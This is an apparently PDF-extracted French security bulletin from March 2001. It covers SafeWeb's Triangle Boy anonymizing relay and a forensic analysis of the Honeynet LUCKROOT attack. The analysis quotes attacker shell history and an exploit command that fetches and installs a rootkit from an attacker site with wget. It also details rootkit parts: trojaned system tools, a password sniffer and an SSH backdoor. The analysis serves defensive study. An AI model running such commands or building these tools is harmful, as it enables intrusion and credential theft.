Dispositif
émise par le demandeur vers la passerelle
Filtrage
Filtrage
SafeWEB.
Requête
Réponse
La réponse est, elle, directement transmise
(SSL)
(SSL)
Accès
Accès
par la passerelle SafeWeb vers le
Direct
Anonyme
1
4
demandeur en usurpant l'adresse IP du dit
2
relais.
3
Celui-ci se comporte comme un simple
Passerelle
Passerelle
Relais
Relais
SAFEWEB
SAFEWEB
TBoy
TBoy
réflecteur de paquet n'ayant aucune
Requête
possibilité d'analyser le flux chiffré SSL,
Info TCP
l'établissement SSL étant réalisé de bout en
Requète
bout.
Réponse
Notons que l'usurpation d'une adresse IP
nécessite, dans le cas d'une session TCP, la
connaissance de certains paramètres numéro de séquence notamment - par la
Serveur
Serveur
passerelle SafeWEB. Ces données sont
WEB
WEB
transmises par le relais Tboy lors du
relayage de la requête.
L'infrastructure proposée permet ainsi non seulement de garantir l'anonymat total mais aussi de contourner tout
dispositif destiné à bloquer l'accès vers SafeWEB (ou tout proxy public moyennant adaptation).
L'adresse de l'anonymiseur n'est en effet jamais transportée
dans les demandes de connexion.
L'utilisation du protocole SSL de bout en bout, c'est à dire
entre le poste client et la passerelle SafeWEB permet de
garantir la confidentialité des échanges vis à vis du relais
Tboy pourtant positionné en coupure.
Un effet de bord doit cependant être noté qui a pour origine
la connexion sur un site différent de celui contenu dans le
certificat présenté par la passerelle SafeWEB. L'utilisateur
doit alors explicitement accepter le certificat après avoir
soigneusement examiné celui-ci.
Une attaque de type 'man in-the-middle' pourrait ainsi être
montée avec la complicité du propriétaire du relais en
présentant le certificat d'un autre relais. Cependant cette
attaque n'ira pas très loin du fait même de la dissymétrie des
échanges.
Il est fort probable que nous assistions à une floraison de
relais Tboy durant le prochain printemps d'autant que
SafeWEB annonce la publication prochaine d'un annuaire
des relais Tboy disponibles dans le monde. Trois relais Tboy
sont d'ors et déjà actifs.
La parade consistant à filtrer les relais TBoy semble vouée à
l'échec. Si la mise en place d'un anonymiseur nécessite de
coûteuses ressources, l'installation d'un relais Triangle Boy
est effectuée en moins d'une minute et ne requiert qu'une
machine de très faible puissance.
Sur le plan pratique, la distribution Triangle Boy est livrée
sous la forme d'une archive tarball contenant les sources 'C'
ainsi que la distribution de la librairie d'accès réseau
'libpcap' (version 0.6.2) nécessaire à la manipulation des
paquets IP.
L'utilisation des classiques outils d'auto-configuration GNU
autorise la compilation et l'installation immédiate de la
distribution sur le système relais.
Une rapide inspection des sources met en évidence un
codage de qualité et ne révèle aucun indice de manipulation.
Rappelons cependant que la CIA possède une participation
indirecte dans la société SafeWEB.
Avant d'être déclaré saine, la distribution Triangle Boy
devra faire l'objet d'une analyse approfondie.
Notons à ce sujet, que la distribution actuelle ne contient que la partie 'cliente' nécessaire au relayage et à la
Page 47/51
Mars 2001
connexion sur la passerelle SafeWEB. La mise en place d'un architecture similaire mais utilisant une passerelle
nécessite de disposer des spécifications du protocole client/serveur ou au moins du code de la partie 'serveur'.
http://www.saveweb.com/webpage/tboy1.php3
TECHNIQUES
LUCKROOT - HONEYNET SCAN OF THE MONTH
Description
Nous proposons ici un travail pratique d'analyse d'une attaque, travail basé sur le challenge 'Scan Of The Month' du
mois de Mars 2001. A la date de parution de ce rapport, ce challenge sera clos et le lecteur pourra vérifier la validité
de notre analyse !
Le challenge Scan Of The Month' consiste à analyser les traces d'une attaque réelle et à répondre aux 5 questions
suivantes:
1. What is the blackhat attempting to do with his command line syntax?
2. What does the tool accomplish?
3. How does the tool work?
4. Is this tool a worm, or would you classify it as something else?
5. Is this tool original, or is it simply based on previous tools?
If based on previous tools, which ones and what is modified?
6. Bonus Question: What information can you obtain about who is using or created the tool?
Le point de départ du challenge prend la forme d'un extrait du journal de sécurité d'un système piégé (honey pot):
Jan 8 18:47:52 honeypot -bash: HISTORY: PID=1246 UID=0 cd .mail
Jan 8 18:48:00 honeypot -bash: HISTORY: PID=1246 UID=0 cd /usr/sbin/.mail
Jan 8 18:48:12 honeypot -bash: HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR
Jan 8 18:48:31 honeypot -bash: HISTORY: PID=1246 UID=0 y
Jan 8 18:48:45 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR
Jan 8 18:48:59 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf Lu
Jan 8 18:49:01 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf L
Jan 8 18:49:03 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR
Jan 8 18:49:06 honeypot -bash: HISTORY: PID=1246 UID=0 cd luckroot
Jan 8 18:49:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 210
Jan 8 18:52:00 honeypot -bash: HISTORY: PID=1246 UID=0 .luckgo 216 200
L'analyse rapide de cet extrait de journal nous conduit à immédiatement aller chercher le paquetage LUCKROOT.TAR
afin de l'étudier en détail. En effet, l'attaquant après avoir pris le contrôle du système piégé charge ce paquetage
depuis le site 'www.becsys.org' en utilisant le navigateur WEB 'lynx'. L'étude de la commande 'luckgo' nous
permettra de comprendre la raison d'être de la série de commandes journalisées.
Notons que l'attaquant rencontre quelques difficultés avant d'arriver à installer le paquetage dans le répertoire
'/usr/sbin/.mail'. A ce propos, les séquences initiales de l'attaque ne nous sont pas fournies. En effet, le répertoire
'.mail' n'existant pas sur un système 'RedHat', l'attaquant a préalablement dû créer celui-ci, action que les extraits
fournis ne détaillent pas. Nous ignorons par ailleurs la technique utilisée pour prendre le contrôle de ce système,
utilisé comme relais.
Analyse de 'luckroot.tar'
Il s'agit en réalité d'une archive tarball dont l'extension devrait être '.tar.z' ou 'tgz' contenant 5 fichiers:
luckstatdx.c: Les sources C d'un code d'exploitation de la vulnérabilité rpc.statd, code dédié RedHat
luckscan-a.c: Les sources C d'un scanner de classe A dédié à la recherche des services rpc.statd actifs
luckstatdx:
La version compilée du code 'luckstatdx.c' au format ELF RedHat
Page 48/51
Mars 2001
luckscan-a:
La version compilée du code 'luckscan.c' au format ELF RedHat
luckgo:
Un script d'interface assurant la compilation et l'activation du scanner, du code d'attaque, et si
tout se passe 'bien', l'installation d'un 'root-kit'.
La lecture attentive du code source 'luckscan-a.c' met en évidence un programme trivial de balayage de toutes les
adresses IP d'une classe A au moyen de trois boucles imbriquées. Le port cible ainsi que les trois premiers blocs (A,
B et C) de l'adresse sont paramétrables.
Le programme d'attaque 'luckstadx' est activé dès qu'un service rpc.statd actif est découvert. Notons qu'aucune
validation n'est préalablement effectuée sur la cible de l'attaque bien que le programme d'attaque soit exécuté avec
l'option '-d 0' spécifiant une cible RedHat 6.2. Le taux d'efficacité de l'attaque en sera d'autant diminué !
Le principe de fonctionnement du programme d'attaque est dévoilé par l'analyse du source 'luckstadx.c':
1. Un paquet UDP contenant un shellcode dédié est transmis sur le service rpc.statd
2. Le shellcode est exécuté sur le système distant à la suite de l'écrasement de la pile du service rpc.statd
3. Celui-ci ouvre un service offrant un shell interactif avec les privilèges 'root' sur le port 39168/TCP
4. Une connexion est alors effectuée depuis le poste de l'attaquant vers ce shell interactif
5. Une séquence de commande est transmise qui permet de rapatrier et d'installer un rootkit depuis un site distant
A partir de ce moment, le système distant doit être considéré comme totalement compromis et nécessitant un
réinstallation complète à partir de supports dont l'intégrité est garantie (attention à ne pas réinstaller une
sauvegarde postérieure à la date de compromission du système).
La commande codée dans source 'luckstadx.c' nous révèle que le 'rootkit' est chargé depuis un site WEB distant :
cd /;uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd
lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n
Ce ' rootkit ' - prononcer exhibit - est bien évidemment
immédiatement téléchargé par nos soins pour analyse
complémentaire. Notons au passage que le dit site accueille le
visiteur par une page ne contenant rien d'autre qu'une
animation 'Macromedia Flash'. Celle-ci ne permet pas
d'identifier le site ou son contenu.
Notre attention a immédiatement été attirée par le message
d'avertissement de notre navigateur (toujours paramétré en
mode 'paranoïaque' ) demandant l'autorisation d'exécution
d'un objet 'Flash'.
En effet, un bulletin d'alerte a été publié début Janvier
2001 portant sur une vulnérabilité présente dans le plugin
Macromedia. Une rapide inspection du contenu du fichier
'becys.swf' ne fait apparaître aucune manipulation malicieuse
du code flash.
En toute logique, l'exploration détaillée de ce site devrait s'avérer fructueuse mais elle nécessite de disposer d'un
point d'entrée dans l'arborescence logique de ce serveur Apache …
Le script 'luckgo' est utilisé de façon intensive par l'attaquant pour sonder plusieurs blocs - dont certains 2 fois de
suite - de classe B soit 65534 adresses possibles: ./luckgo 216 210 pour la classe 216.210.x.x. Le résultat de
l'analyse* de l'utilisation de ce script est présenté dans le tableau suivant qui met en évidence la cible principale du
l'attaquant: les fournisseurs d'accès Américain.
Plage
N Durée (s)
Commentaire
Class.
12.20.x.x
1
NA
US AT&T
[Bloc complet]
FAI
A
24.1.x.x
1
745
US @Home Network
[Bloc complet]
FAI
A
63.1.x.x
1
40
US UUNET
[Bloc complet]
FAI
A
64.1.x.x
1
31
US Concentric Network Corporation
[Bloc complet]
FAI
A
64.120.x.x
1
17
US Teligent Inc
[Bloc complet]
FAI
A
194.1.x.x
1
72
SL TAXNET (Network of the Slovak Tax Offices)
[Bloc Partiel ]
PRI
C
200.120.x.x
2
36 - 49
Inconnu
C
210.120.x.x
1
59
KR BORANET
[Bloc complet]
FAI
C
210.128.x.x
1
677
JP
Japan Network Information Center
[Bloc complet]
FAI
C
216.1.x.x
2
80 - 127
US Business Internet, Inc. [Bloc complet]
FAI
C
216.10.x.x
1
598
US 21 sociétés diverses
PRI
C
216.200.x.x
2 6
- 151
US Abovenet Communications, Inc.
[Bloc complet]
FAI
C
216.210.x.x
1
114
CA TotalNet, Inc
[Bloc complet]
FAI
C
* Ces données peuvent n'avoir aucun fondement car susceptibles d'avoir été modifiées/masquées avant publication du challenge
Analyse xzibit.tar.gz
Il s'agit d'une archive tarball (format tgz. ou tar.gz) contenant les fichiers présentés en suivant et ici regroupés par
catégorie. La plupart de ces fichiers sont des exécutables dont les sources ne sont pas livrées. Un travail de rétroanalyse est donc nécessaire pour déterminer la fonctionnalité du programme sans avoir à exécuter celui-ci. Pour
notre part, l'expérience, un moteur de recherche performant et un bon éditeur hexadécimal suffisent à déterminer
sans ambiguïté les fonctionnalités du code. Une exécution en environnement contraint permettra, si nécessaire, de
lever certains doutes.
Page 49/51
Mars 2001
install:
Le fichier script d'installation du 'rootkit'. Sa
lecture dévoile le fonctionnement du 'rootkit'.
becsys.cgi:
Un cgi-bin compilé pour l'environnement RedHat
offrant l'interface de commande présenté ci-contre
linsniffer:
Un mini sniffer réseau attaché à l'interface 'eth0'
journalisant les paquets dans le fichier 'tcp.log'.
Cet outil disponible en source est l'un des préférés
des pirates pour sa très faible taille.
logclear:
Le script de lancement du sniffer 'linsniffer'
sense:
Un script assurant l'extraction des mots de passe à
partir des données journalisées par 'linsniffer'
sl2:
Un programme réseau peu documenté dont
l'analyse statique laisse supposer qu'il s'agit d'un
outil de saturation de type 'flooder'.
sshdu:
Un service d'accès SSH modifié utilisant le fichier de configuration 's' et actif sur le port déclaré
dans celui-ci, soit TCP/6969.
s:
Le fichier de configuration SSH associé (normalement dénommé sshd_config). Les fichiers de
paramétrage sont localisés sous le répertoire '/dev/ida/.inet'.
ssh_host_key:
Fichier protégé par un mot de passe - hélas inconnu - contenant la clef privée du service
SSH ainsi qu'un commentaire.
ssh_random_seed:
Fichier de configuration du service SSH utilisé pour l'initialisation du générateur d'aléa.
hdparm:
Un script chargé d'initialiser en arrière plan l'utilitaire d'analyse réseau 'linsniffer' et la porte
dérobée 'sshdu'.
ifconfig:
Une commande 'ifconfig' modifiée pour masquer l'activité de 'linsniffer' (interface eth0 en mode
promiscuous)
netstat:
Une commande 'netstat' modifiée pour ne pas faire apparaître les connexions établis par/avec les
adresses contenues dans le fichier /dev/caca
ps:
Une commande 'ps' modifiée pour masquer les processus dont le nom est présent dans le fichier
/dev/dsx
top:
Une commande 'top' modifiée pour masquer les processus dont le nom est présent dans le fichier
/dev/dsx
Le principe de fonctionnement du rootkit est dévoilé par l'analyse du script 'install':
1. Remplacement des exécutables 'ifconfig', 'netstat', 'ps', 'top' par les versions altérées. Les versions originales
sont détruites.
2. Création du fichier '/dev/dsx' contenant la liste des exécutables ne devant pas être rendus visibles: 'sl2',
'sshdu', 'linsniffer' , 'smurf', 'slice', 'mech', 'bnc', 'psybync'.
3. Création du fichier '/dev/caca' contenant les caractéristiques des connexions devant être masquées: blocs
d'adresses IP 193.231.139, 213.154.137, 193.254.34, services: 6969, 3666, 31221, 22546, ports sources:
6969, 2222.
4. Création du répertoire masqué '/dev/ida/.net' et copie des différents utilitaires 'linsniffer', 'sense', 'sl2',
'sshdu', 's' , …
5. Copie d'une version altérée de l'utilitaire 'hdparm' dans le répertoire '/usr/bin' puis modification du fichier
d'initialisation système '/etc/rc.d/rc.sysinit' conduisant à exécuter le script 'hdparm' lors de chaque
démarrage du système.
6. Recherche la présence d'un serveur WEB de type apache et copie de l'interface de commande 'becys.cgi' dans le
répertoire 'cgi-bin' associé.
7. Collecte des informations systèmes via les commandes 'ifconfig' (paramètres d'accès réseau), 'hostname' (nom
complet du système), 'uname' (identité du noyau) et transmission de ces données par mail vers l'adresse
'[email protected]'.
8. Destruction du répertoire 'lamerk' et de l'archive 'xzibit.tar.gz'.
L'analyse du script d'installation permet d'avancer dans l'analyse. La liste présente dans '/dev/dsx' n'est pas
cohérente avec la distribution contenue dans le 'rootkit' étudié. Par ailleurs, une recherche approfondie portant sur
les caractéristiques de ce 'rootkit' ne retourne que deux références, la première datant du 27 Décembre 2000, la
seconde du 31 Janvier 2001. Ces deux références mentionnent un paquetage dénommé 'srk.tar.gz' et non
'xzibit.tar.gz'. Il semble donc que ce paquetage résulte d'un adaptation du paquetage 'srk.tar.gz' lui-même
probablement dérivé du 'célèbre' lrk4 de Lord Somer. Notons qu'il s'agit ici d'une adaptation rapide et imparfaite
comme le prouve l'absence du fichier source de l'utilitaire 'sl2', fichier pourtant référencé dans le script d'installation,
mais aussi l'existence d'une erreur de programmation: la commande de destruction du paquetage est activée deux
fois: dans le script 'install' et dans l'utilitaire 'luckstadx'.
Page 50/51
Mars 2001
L'étude des blocs d'adresses n'apporte hélas guère d'informations complémentaires, ces blocs étant issus d'un
découpage de classes partiellement allouées à 'The Romanian Education Network', 'Royston Automotive Ltd' et
'OnLine Finance'. Notons simplement la présence d'une entité localisée en Roumanie, contrée actuellement très
actif dans le domaine des attaques réseaux.
Conclusion
Les informations collectées lors de cette analyse, purement statique rappelons-le, permettent de répondre point par
point aux questions posées par le challenge 'Scan Of The Month' du mois de Mars. La mise en place d'un piège à
mouche - ou Honey Pot - permettant d'étudier plus en détail et de manière dynamique le comportement de
l'attaquant, peut même être envisagée.
Il suffit pour cela de simuler l'exécution du script ' install ' et d'envoyer un courrier à l'adresse '[email protected]'
ayant pour sujet 'becys rewting', contenant le résultat des commandes '/sbin/ifconfig | grep inet', 'hostname -f'
et 'uname -a'. Bien entendu, le nom de domaine et l'adresse IP devront pointer sur le système piégé.
http://project.honeynet.org/scans/scan13/
Page 51/51

Veille Technologique Sécurité

Transcription

Documents pareils

Télécharger

Formation_EH_serval

Apogée TADELAKT

Veille Technologique Sécurité

Veille Technologique Sécurité

AUX ETATS-UNIS Social Security 401k, 403b EN FRANCE Régime

HEBERGEMENT WEB LUXEMBOURG

Data - Stormshield

couverture étendue de correctifs de fonctionnalité

apogee - Musea